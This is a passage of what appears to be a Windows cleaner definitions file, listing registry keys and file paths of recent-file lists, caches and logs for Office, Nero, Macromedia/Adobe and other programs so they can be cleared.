RegKey2=HKCU\Software\Microsoft\Office\10.0\Excel\Recent Files
RegKey3=HKCU\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent File List
RegKey4=HKCU\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List
RegKey5=HKCU\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Web List
RegKey6=HKCU\Software\Microsoft\Office\10.0\Word\Recent Templates
RegKey7=HKCU\Software\Microsoft\Office\10.0\Common\Internet|UseRWHlinkNavigation
FileKey1=%AppData%\Microsoft\Office\Recent|*.*
FileKey2=%AppData%\Microsoft\Office|*.tmp|RECURSE
RegKey1=HKCU\Software\Microsoft\Office\11.0\Excel\Recent Files
RegKey2=HKCU\Software\Microsoft\Office\11.0\Common\Open Find\Microsoft Office Word\Settings\Save As\File Name MRU
RegKey3=HKCU\Software\Microsoft\Office\11.0\PowerPoint\Recent File List
RegKey4=HKCU\Software\Microsoft\Office\11.0\Publisher\Recent File List
RegKey5=HKCU\Software\Microsoft\Office\11.0\InfoPath\Recent File List
RegKey6=HKCU\Software\Microsoft\Office\11.0\Common\Internet\Server Cache
RegKey7=HKCU\Software\Microsoft\Office\11.0\Common\Internet|UseRWHlinkNavigation
RegKey8=HKCU\Software\Microsoft\MSPaper 11.0\Persist File Name
RegKey9=HKCU\Software\Microsoft\MSPaper 11.0\Recent File List
RegKey10=HKCU\Software\Microsoft\Office\11.0\Visio\Application|LastFile1
RegKey11=HKCU\Software\Microsoft\Office\11.0\Visio\Application|LastFile2
RegKey12=HKCU\Software\Microsoft\Office\11.0\Visio\Application|LastFile3
RegKey13=HKCU\Software\Microsoft\Office\11.0\Visio\Application|LastFile4
RegKey14=HKCU\Software\Microsoft\Office\11.0\Visio\Application|LastFile5
RegKey15=HKCU\Software\Microsoft\Office\11.0\Visio\Application|LastFile6
RegKey16=HKCU\Software\Microsoft\Office\11.0\Visio\Application|LastFile7
RegKey17=HKCU\Software\Microsoft\Office\11.0\Visio\Application|LastFile8
RegKey18=HKCU\Software\Microsoft\Office\11.0\Outlook\Contact|QuickFindMRU
RegKey19=HKCU\Software\Microsoft\Office\11.0\Outlook\Contact|StripSearchMRU
RegKey20=HKCU\Software\Microsoft\Office\11.0\Outlook\Preferences|LocationMRU
RegKey21=HKCU\Software\Microsoft\Office\11.0\Excel Viewer\Recent Files
RegKey22=HKCU\Software\Microsoft\Office\Common|FontBmpCache
RegKey1=HKCU\Software\Microsoft\Office\12.0\Common\Open Find\Microsoft Office Word\Settings\Save As\File Name MRU
RegKey2=HKCU\Software\Microsoft\Office\12.0\Word\File MRU
RegKey3=HKCU\Software\Microsoft\Office\12.0\Excel\File MRU
RegKey4=HKCU\Software\Microsoft\Office\12.0\Access\Settings|MRU1
RegKey5=HKCU\Software\Microsoft\Office\12.0\Access\Settings|MRU2
RegKey6=HKCU\Software\Microsoft\Office\12.0\Access\Settings|MRU3
RegKey7=HKCU\Software\Microsoft\Office\12.0\Access\Settings|MRU4
RegKey8=HKCU\Software\Microsoft\Office\12.0\Access\Settings|MRU5
RegKey9=HKCU\Software\Microsoft\Office\12.0\Access\Settings|MRU6
RegKey10=HKCU\Software\Microsoft\Office\12.0\Access\Settings|MRU7
RegKey11=HKCU\Software\Microsoft\Office\12.0\Access\Settings|MRU8
RegKey12=HKCU\Software\Microsoft\Office\12.0\PowerPoint\File MRU
RegKey13=HKCU\Software\Microsoft\Office\12.0\Common\Open Find\Microsoft Office PowerPoint\Settings\Save As\File Name MRU
RegKey14=HKCU\Software\Microsoft\Office\12.0\Common\Open Find\Microsoft Office InfoPath\Settings\Open\File Name MRU
RegKey15=HKCU\Software\Microsoft\Office\12.0\Common\Open Find\Microsoft Office InfoPath\Settings\Save As\File Name MRU
RegKey16=HKCU\Software\Microsoft\Office\12.0\Common\Open Find\Microsoft Office Excel\Settings\Save As\File Name MRU
RegKey17=HKCU\Software\Microsoft\Office\12.0\Common\Open Find\Microsoft Office Publisher\Settings\Save As\File Name MRU
RegKey18=HKCU\Software\Microsoft\Office\12.0\Publisher\Recent File List
RegKey19=HKCU\Software\Microsoft\Office\12.0\InfoPath\Recent File List
RegKey20=HKCU\Software\Microsoft\Office\12.0\Excel Viewer\Viewer File MRU
RegKey21=HKCU\Software\Microsoft\Office\12.0\Clip Organizer\Search\Last Query
FileKey3=%LocalAppData%\Microsoft\Office\14.0\OfficeFileCache|*.*|RECURSE
RegKey1=HKCU\Software\Microsoft\Office\14.0\Access\File MRU
RegKey2=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Access\Settings\Default Database Path\File Name MRU
RegKey3=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Access\Settings\Default Theme for New Databases\File Name MRU
RegKey4=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Access\Settings\File New Database\File Name MRU
RegKey5=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Access\Settings\File Open\File Name MRU
RegKey6=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Access\Settings\File Save\File Name MRU
RegKey7=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Access\Settings\Open\File Name MRU
RegKey8=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Access\Settings\Save As\File Name MRU
RegKey9=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Access\Settings\Default Database Path\File Name MRU
RegKey10=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Access\Settings\Default Theme for New Databases\File Name MRU
RegKey11=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Access\Settings\File New Database\File Name MRU
RegKey12=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Access\Settings\File Open\File Name MRU
RegKey13=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Access\Settings\File Save\File Name MRU
RegKey14=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Access\Settings\Open\File Name MRU
RegKey15=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Access\Settings\Save As\File Name MRU
RegKey16=HKCU\Software\Microsoft\Office\14.0\Word\File MRU
RegKey17=HKCU\Software\Microsoft\Office\14.0\Word\Place MRU
RegKey18=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Word\Settings\Browse\File Name MRU
RegKey19=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Word\Settings\File Open\File Name MRU
RegKey20=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Word\Settings\File Save\File Name MRU
RegKey21=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Word\Settings\Modify Location\File Name MRU
RegKey22=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Word\Settings\Save As\File Name MRU
RegKey23=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Word\Settings\Browse\File Name MRU
RegKey24=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Word\Settings\File Open\File Name MRU
RegKey25=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Word\Settings\File Save\File Name MRU
RegKey26=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Word\Settings\Modify Location\File Name MRU
RegKey27=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Word\Settings\Save As\File Name MRU
RegKey28=HKCU\Software\Microsoft\Office\14.0\Excel\File MRU
RegKey29=HKCU\Software\Microsoft\Office\14.0\Excel\Place MRU
RegKey30=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Excel\Settings\Browse\File Name MRU
RegKey31=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Excel\Settings\File Open\File Name MRU
RegKey32=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Excel\Settings\File Save\File Name MRU
RegKey33=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Excel\Settings\Modify Location\File Name MRU
RegKey34=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Excel\Settings\Save As\File Name MRU
RegKey35=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Excel\Settings\Browse\File Name MRU
RegKey36=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Excel\Settings\File Open\File Name MRU
RegKey37=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Excel\Settings\File Save\File Name MRU
RegKey38=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Excel\Settings\Modify Location\File Name MRU
RegKey39=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Excel\Settings\Save As\File Name MRU
RegKey40=HKCU\Software\Microsoft\Office\14.0\Publisher\File MRU
RegKey41=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Publisher\Settings\File Open\File Name MRU
RegKey42=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Publisher\Settings\File Save\File Name MRU
RegKey43=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Publisher\Settings\Open Publication\File Name MRU
RegKey44=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Publisher\Settings\Save As\File Name MRU
RegKey45=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Publisher\Settings\File Open\File Name MRU
RegKey46=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Publisher\Settings\File Save\File Name MRU
RegKey47=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Publisher\Settings\Open Publication\File Name MRU
RegKey48=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Publisher\Settings\Save As\File Name MRU
RegKey49=HKCU\Software\Microsoft\Office\14.0\PowerPoint\File MRU
RegKey50=HKCU\Software\Microsoft\Office\14.0\PowerPoint\Place MRU
RegKey51=HKCU\Software\Microsoft\Office\14.0\PowerPoint\RecentFolderList
RegKey52=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft PowerPoint\Settings\Browse\File Name MRU
RegKey53=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft PowerPoint\Settings\File Open\File Name MRU
RegKey54=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft PowerPoint\Settings\File Save\File Name MRU
RegKey55=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft PowerPoint\Settings\Open\File Name MRU
RegKey56=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft PowerPoint\Settings\Save As\File Name MRU
RegKey57=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office PowerPoint\Settings\Browse\File Name MRU
RegKey58=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office PowerPoint\Settings\File Open\File Name MRU
RegKey59=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office PowerPoint\Settings\File Save\File Name MRU
RegKey60=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office PowerPoint\Settings\Open\File Name MRU
RegKey61=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office PowerPoint\Settings\Save As\File Name MRU
RegKey62=HKCU\Software\Microsoft\Office\14.0\InfoPath\Designer File MRU
RegKey63=HKCU\Software\Microsoft\Office\14.0\InfoPath\Filler File MRU
RegKey64=HKCU\Software\Microsoft\Office\14.0\InfoPath\Recent Templates
RegKey65=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft InfoPath\Settings\Browse\File Name MRU
RegKey66=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft InfoPath\Settings\File Open\File Name MRU
RegKey67=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft InfoPath\Settings\File Save\File Name MRU
RegKey68=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft InfoPath\Settings\Open\File Name MRU
RegKey69=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft InfoPath\Settings\Open in Design Mode\File Name MRU
RegKey70=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft InfoPath\Settings\Save As\File Name MRU
RegKey71=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office InfoPath\Settings\Browse\File Name MRU
RegKey72=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office InfoPath\Settings\File Open\File Name MRU
RegKey73=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office InfoPath\Settings\File Save\File Name MRU
RegKey74=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office InfoPath\Settings\Open\File Name MRU
RegKey75=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office InfoPath\Settings\Open in Design Mode\File Name MRU
RegKey76=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office InfoPath\Settings\Save As\File Name MRU
RegKey77=HKCU\Software\Microsoft\Office\14.0\OneNote\OpenNotebooks
RegKey78=HKCU\Software\Microsoft\Office\14.0\OneNote\RecentNotebooks
RegKey79=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft OneNote\Settings\File Open\File Name MRU
RegKey80=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft OneNote\Settings\File Save\File Name MRU
RegKey81=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft OneNote\Settings\Open Backup\File Name MRU
RegKey82=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft OneNote\Settings\Open Notebook\File Name MRU
RegKey83=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft OneNote\Settings\Save As\File Name MRU
RegKey84=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft OneNote\Settings\Select File\File Name MRU
RegKey85=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft OneNote\Settings\Select Folder\File Name MRU
RegKey86=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office OneNote\Settings\File Open\File Name MRU
RegKey87=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office OneNote\Settings\File Save\File Name MRU
RegKey88=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office OneNote\Settings\Open Backup\File Name MRU
RegKey89=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office OneNote\Settings\Open Notebook\File Name MRU
RegKey90=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office OneNote\Settings\Save As\File Name MRU
RegKey91=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office OneNote\Settings\Select File\File Name MRU
RegKey92=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office OneNote\Settings\Select Folder\File Name MRU
RegKey93=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Outlook\Settings\Create or Open Outlook Data File\File Name MRU
RegKey94=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Outlook\Settings\File Open\File Name MRU
RegKey95=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Outlook\Settings\File Save\File Name MRU
RegKey96=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Outlook\Settings\Open Calendar\File Name MRU
RegKey97=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Outlook\Settings\Open Outlook Data File\File Name MRU
RegKey98=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Outlook\Settings\Create or Open Outlook Data File\File Name MRU
RegKey99=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Outlook\Settings\File Open\File Name MRU
RegKey100=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Outlook\Settings\File Save\File Name MRU
RegKey101=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Outlook\Settings\Open Calendar\File Name MRU
RegKey102=HKCU\Software\Microsoft\Office\14.0\Common\Open Find\Microsoft Office Outlook\Settings\Open Outlook Data File\File Name MRU
RegKey103=HKCU\Software\Microsoft\Office\14.0\Clip Organizer\Search\Last Query
RegKey104=HKCU\Software\Microsoft\Office\Common|FontBmpCache
RegKey105=HKCU\Software\Microsoft\Office\14.0\Visio\Recent Templates|Friendly1
RegKey106=HKCU\Software\Microsoft\Office\14.0\Visio\Recent Templates|Friendly2
RegKey107=HKCU\Software\Microsoft\Office\14.0\Visio\Recent Templates|Friendly3
RegKey108=HKCU\Software\Microsoft\Office\14.0\Visio\Recent Templates|Friendly4
RegKey109=HKCU\Software\Microsoft\Office\14.0\Visio\Recent Templates|Template1
RegKey110=HKCU\Software\Microsoft\Office\14.0\Visio\Recent Templates|Template2
RegKey111=HKCU\Software\Microsoft\Office\14.0\Visio\Recent Templates|Template3
RegKey112=HKCU\Software\Microsoft\Office\14.0\Visio\Recent Templates|Template4
RegKey113=HKCU\Software\Microsoft\Office\14.0\Visio\Application|LastFile1
RegKey114=HKCU\Software\Microsoft\Office\14.0\Visio\Application|LastFile2
RegKey115=HKCU\Software\Microsoft\Office\14.0\Visio\Application|LastFile3
RegKey116=HKCU\Software\Microsoft\Office\14.0\Visio\Application|LastFile4
RegKey117=HKCU\Software\Microsoft\Office\14.0\Visio\Application|LastFile5
RegKey118=HKCU\Software\Microsoft\Office\14.0\Visio\Application|LastFile6
RegKey119=HKCU\Software\Microsoft\Office\14.0\Visio\Application|LastFile7
RegKey120=HKCU\Software\Microsoft\Office\14.0\Visio\Application|LastFile8
RegKey121=HKCU\Software\Microsoft\Office\14.0\Visio\Application|LastFile9
RegKey122=HKCU\Software\Microsoft\Office\14.0\Visio\Application|LastFile10
RegKey123=HKCU\Software\Microsoft\Office\14.0\Visio\Application|LastFile11
RegKey124=HKCU\Software\Microsoft\Office\14.0\Visio\Application|LastFile12
RegKey125=HKCU\Software\Microsoft\Office\14.0\Outlook\Search
FileKey2=%LocalAppData%\Microsoft\MSOIdentityCRL\production\temp|*.*_sync
FileKey3=%AppData%\Microsoft\PowerPoint\Sync\Temp|*.*
RegKey1=HKCU\Software\Microsoft\Office\15.0\Access\File MRU
RegKey2=HKCU\Software\Microsoft\Office\15.0\Word\File MRU
RegKey3=HKCU\Software\Microsoft\Office\15.0\Word\Place MRU
RegKey4=HKCU\Software\Microsoft\Office\15.0\Excel\File MRU
RegKey5=HKCU\Software\Microsoft\Office\15.0\Excel\Place MRU
RegKey6=HKCU\Software\Microsoft\Office\15.0\Publisher\File MRU
RegKey7=HKCU\Software\Microsoft\Office\15.0\PowerPoint\File MRU
RegKey8=HKCU\Software\Microsoft\Office\15.0\PowerPoint\Place MRU
RegKey9=HKCU\Software\Microsoft\Office\15.0\OneNote\RecentNotebooks
RegKey10=HKCU\Software\Microsoft\Office\15.0\Word\User MRU
RegKey11=HKCU\Software\Microsoft\Office\15.0\Excel\User MRU
RegKey12=HKCU\Software\Microsoft\Office\15.0\Access\User MRU
RegKey13=HKCU\Software\Microsoft\Office\15.0\Publisher\User MRU
RegKey14=HKCU\Software\Microsoft\Office\15.0\PowerPoint\User MRU
ExcludeKey1=FILE|%AppData%\Microsoft\Office\Recent\|Welcome to Word.LNK
ExcludeKey2=FILE|%AppData%\Microsoft\Office\Recent\|Welcome to Publisher.LNK
ExcludeKey3=FILE|%AppData%\Microsoft\Office\Recent\|Welcome to OneNote.LNK
RegKey1=HKCU\Software\InstallShield\Developer\7.0\Recent File List
RegKey1=HKCU\Software\Macromedia\Flash 4\Recent File List
RegKey1=HKCU\Software\Macromedia\Flash 5\Recent File List
RegKey1=HKCU\Software\Macromedia\Flash 6\Recent File List
RegKey1=HKCU\Software\Macromedia\Flash 7\Recent File List
Detect=HKCR\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}
DetectFile=%SystemDirectory%\Macromed\flash\flashplayer.xpt
SpecialKey1=N_FLASH_COOKIES
RegKey1=HKCU\Software\Macromedia\FlashPlayer|RecentMovie1
RegKey2=HKCU\Software\Macromedia\FlashPlayer|RecentMovie2
RegKey3=HKCU\Software\Macromedia\FlashPlayer|RecentMovie3
RegKey4=HKCU\Software\Macromedia\FlashPlayer|RecentMovie4
RegKey5=HKCU\Software\Macromedia\FlashPlayer|RecentMovie5
RegKey6=HKCU\Software\Macromedia\FlashPlayer|RecentMovie6
RegKey7=HKCU\Software\Macromedia\FlashPlayer|RecentMovie7
RegKey8=HKCU\Software\Macromedia\FlashPlayer|RecentMovie8
RegKey9=HKCU\Software\Macromedia\FlashPlayer|RecentMovie9
RegKey1=HKCU\Software\Macromedia\HomeSite5\RecentFiles
RegKey1=HKCU\Software\Macromedia\Firework 6\Recent File List
RegKey1=HKCU\Software\Adobe\Fireworks\12.0\ini\Recent File List
FileKey1=%AppData%\Adobe\Fireworks CS6|Project_Log.htm;Web_Log.htm
RegKey1=HKCU\Software\Macromedia\Dreamweaver MX 2004\Recent File List
RegKey1=HKCU\Software\Macromedia\Shockwave 10\movies
RegKey2=HKCU\Software\AppDataLow\Software\Macromedia\Shockwave 10\movies
RegKey3=HKCU\Software\AppDataLow\Software\Macromedia\Shockwave 10\statistics
FileKey1=%LocalLowAppData%\Macromedia\Shockwave Player|Shockwave Log
RegKey1=HKCU\Software\AppDataLow\Software\Adobe\Shockwave 11\moviestats\movies
RegKey2=HKCU\Software\AppDataLow\Software\Adobe\Shockwave 11\moviestats\sessions
RegKey3=HKCU\Software\Adobe\Shockwave 11\moviestats\movies
RegKey4=HKCU\Software\Adobe\Shockwave 11\moviestats\sessions
RegKey5=HKCU\Software\AppDataLow\Software\Adobe\Shockwave 11\movies
RegKey6=HKCU\Software\Adobe\Shockwave 11\movies
RegKey7=HKCU\Software\AppDataLow\Software\Adobe\Shockwave 11\statistics
FileKey1=%LocalLowAppData%\Adobe\Shockwave Player 11|Shockwave Log
FileKey1=%LocalAppData%\Microsoft\Silverlight\is|*.*|RECURSE
FileKey2=%LocalLowAppData%\Microsoft\Silverlight\is|*.*|RECURSE
FileKey3=%LocalLowAppData%\Microsoft\Silverlight|*.tmp
ExcludeKey1=FILE|%LocalAppData%\Microsoft\Silverlight\is\*\|disabled.dat
ExcludeKey2=FILE|%LocalLowAppData%\Microsoft\Silverlight\is\*\|disabled.dat
RegKey1=HKCU\Software\Ulead Systems\Ulead SmartSaver Pro\3.0\Recent File List
FileKey1=%commonappdata%\Symantec\Norton AntiVirus Corporate Edition\7.5\Logs|*.log
FileKey2=%localappdata%\Symantec\Norton AntiVirus Corporate Edition\7.5\Logs|*.log
FileKey3=%commonappdata%\Symantec\LiveUpdate\Downloads|*.*
FileKey1=%commonappdata%\Symantec\Symantec AntiVirus Corporate Edition\7.5\Logs|*.log
FileKey2=%localappdata%\Symantec\Symantec AntiVirus Corporate Edition\7.5\Logs|*.log
RegKey1=HKCU\Software\Microsoft\Snapshot Viewer\Recent File List
FileKey1=%localappdata%\Microsoft\Terminal Server Client\Cache|*.*
RegKey1=HKCU\Software\Microsoft\Terminal Server Client\Default
ExcludeKey1=REG|HKCU\Software\Microsoft\Terminal Server Client\Default\AddIns
RegKey1=HKCU\Software\Microsoft\Microsoft Management Console\Recent File List
Detect=HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List
Detect=HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Paint
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List
RegKey1=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor|LastFile1
RegKey2=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor|LastFile2
RegKey3=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor|LastFile3
RegKey4=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor|LastFile4
RegKey5=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor|LastType1
RegKey6=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor|LastType2
RegKey7=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor|LastType3
RegKey8=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor|LastType4
DetectFile=%CommonAppData%\Microsoft\Search
FileKey1=%CommonAppData%\Microsoft\Search|*.log|RECURSE
RegKey1=HKCU\Software\ahead\Nero - Burning Rom\Settings|BrowserDir
RegKey2=HKCU\Software\ahead\Nero - Burning Rom\Settings|ImageDir
RegKey3=HKCU\Software\ahead\Nero - Burning Rom\Settings|WorkingDir
RegKey4=HKLM\Software\Ahead\Nero - Burning Rom\Settings|ImageDir
RegKey5=HKLM\Software\Ahead\Nero - Burning Rom\Settings|BootImageDir
RegKey6=HKCU\Software\Ahead\Nero - Burning Rom\Recent File List
RegKey7=HKCU\Software\Ahead\Cover Designer\Recent File List
RegKey8=HKCU\Software\Ahead\Nero Wave Editor\Recent File List
FileKey1=%ProgramFiles%\Ahead\Nero|NeroHistory.log
RegKey1=HKCU\Software\Nero\Nero 9\Nero Burning ROM\Settings|BrowserDir
RegKey2=HKCU\Software\Nero\Nero 9\Nero Burning ROM\Settings|ImageDir
RegKey3=HKCU\Software\Nero\Nero 9\Nero Burning ROM\Settings|WorkingDir
RegKey4=HKCU\Software\Nero\Nero 9\Nero Burning ROM\Settings|BootImageDir
RegKey5=HKCU\Software\Nero\Nero 9\Nero Burning ROM\Recent File List
FileKey1=%appdata%\Nero\Nero 9\Nero Burning ROM|*.log
RegKey1=HKCU\Software\Nero\Nero 10\Nero Burning ROM\Settings|BrowserDir
RegKey2=HKCU\Software\Nero\Nero 10\Nero Burning ROM\Settings|ImageDir
RegKey3=HKCU\Software\Nero\Nero 10\Nero Burning ROM\Settings|WorkingDir
RegKey4=HKCU\Software\Nero\Nero 10\Nero Burning ROM\Settings|BootImageDir
RegKey5=HKCU\Software\Nero\Nero 10\Nero Burning ROM\Settings|NeroCompilation
RegKey6=HKCU\Software\Nero\Nero 10\Nero\Recent File List
FileKey1=%appdata%\Nero\Nero 10\Nero Burning ROM|*.log
RegKey1=HKCU\Software\Nero\Nero 15\Nero Burning ROM\Settings|BrowserDir
RegKey2=HKCU\Software\Nero\Nero 15\Nero Burning ROM\Settings|ImageDir
RegKey3=HKCU\Software\Nero\Nero 15\Nero Burning ROM\Settings|WorkingDir
RegKey4=HKCU\Software\Nero\Nero 15\Nero Burning ROM\Settings|BootImageDir
RegKey5=HKCU\Software\Nero\Nero 15\Nero Burning ROM\Settings|NeroCompilation
RegKey6=HKCU\Software\Nero\Nero 15\Nero Burning ROM\Settings\NeroIsoListView|IsoPath
RegKey7=HKCU\Software\Nero\Nero 15\Nero Burning ROM\Recent File List
RegKey8=HKCU\Software\Nero\Nero 15\Nero Burning ROM\AutoSave|LastAutoSave
RegKey9=HKCU\Software\Nero\Nero 15\Nero Burning ROM\General|LastSaveTrackPath
FileKey1=%AppData%\Nero\Nero 15\Nero Burning ROM|NeroHistory.log
RegKey1=HKCU\Software\Nero\Nero 12\Nero Burning ROM\Recent File List
RegKey2=HKCU\Software\Nero\Nero 12\Nero Burning ROM\Settings|BrowserDir
RegKey3=HKCU\Software\Nero\Nero 12\Nero Burning ROM\Settings|ImageDir
RegKey4=HKCU\Software\Nero\Nero 12\Nero Burning ROM\Settings|NeroCompilation
RegKey5=HKCU\Software\Nero\Nero 12\Nero Express\Recent File List
RegKey6=HKCU\Software\Nero\Nero 12\Nero Express\Settings|WorkingDir
RegKey7=HKCU\Software\Nero\Nero 12\Nero Express\Settings|BrowserDir
RegKey8=HKCU\Software\Nero\Nero 12\Nero Express\General|OFDLastISODir
RegKey9=HKCU\Software\Nero\Nero 12\Nero Express\General|OFDLastAudioDir
RegKey10=HKCU\Software\Nero\Nero 12\Nero Express\General|OFDLastVideoDVDKey
RegKey11=HKCU\Software\Nero\Nero 12\Nero WaveEditor\Recent File List
RegKey12=HKCU\Software\Nero\Nero 12\Nero CoverDesigner\Recent File List
FileKey1=%CommonAppData%\Nero\PeakFiles|*.tmp
FileKey2=%AppData%\Nero\Nero 12\Nero Recode\AnalysisData|*.jpg;*.xml
FileKey3=%AppData%\Nero\Nero 12\Nero BackItUp\Cache|*.txt
FileKey4=%AppData%\Nero\Nero 12\Nero Burning ROM|*.log;*Burning*.dmp
FileKey5=%AppData%\Nero\Nero 12\Nero3D|Direct3D.log
FileKey6=%AppData%\Nero\Nero 12\Nero Vision|NeroVideoLog.txt
FileKey7=%SystemDrive%\Windows\SysWOW64|*-NeroRescueAgent.txt
RegKey1=HKCU\Software\Nero\Nero 15\Nero Burning ROM\Settings|WorkingDir
RegKey2=HKCU\Software\Nero\Nero 15\Nero Burning ROM\Settings|BootImageDir
RegKey3=HKCU\Software\Nero\Nero 15\Nero Burning ROM\Settings\NeroIsoListView|IsoPath
RegKey4=HKCU\Software\Nero\Nero 15\Nero Burning ROM\AutoSave|LastAutoSave
RegKey5=HKCU\Software\Nero\Nero 15\Nero Burning ROM\General|LastSaveTrackPath
RegKey6=HKCU\Software\Nero\Nero 15\Nero Burning ROM\Recent File List
RegKey7=HKCU\Software\Nero\Nero 15\Nero Burning ROM\Settings|BrowserDir
RegKey8=HKCU\Software\Nero\Nero 15\Nero Burning ROM\Settings|ImageDir
RegKey9=HKCU\Software\Nero\Nero 15\Nero Burning ROM\Settings|NeroCompilation
RegKey10=HKCU\Software\Nero\Nero 15\Nero Express\Recent File List
